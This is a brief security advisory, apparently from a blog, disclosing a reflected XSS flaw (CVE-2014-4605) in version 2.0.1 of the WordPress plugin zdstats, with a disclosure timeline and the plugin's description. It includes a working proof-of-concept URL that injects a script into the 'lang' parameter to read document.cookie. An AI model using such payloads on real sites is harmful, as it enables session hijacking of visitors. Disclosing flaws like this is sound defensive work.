wp-plugin : zdstats – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : zdstats

 

Effected Version : 2.0.1 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/zdstats/cal/test.php?lang=”></script><script>alert(document.cookie)</script>&

Vulnerable Parameter¬†:¬†‘lang’

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-17

 
Plugin Status : Updated
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4605

 
Plugin Description :
 
ZdStatistics is a wordpress plugin allowing you to trace your visitors. This is not a simple statistics plugin, it is very flexible and dynamic. This means you can update your filters by yourself and therefore by as realistic as possible.

Here is a lsit of functions :

* Display a summary of visits (week, month, trimester, semester and year)
* Display Pageviews and visitors with daily precision
* Referring pages
* Used keywords
* Localization of your visitors
* Browser / OS
* Outgoing links

The statistics are collected and instantly processed, or not, as you can decide this using an option. You can also separate feeds from real pageviews, exclude some IPs from being collected (@home, @work, @school, etc...) and choose to collect robots pageviews or not.

Leave a Reply

Your email address will not be published. Required fields are marked *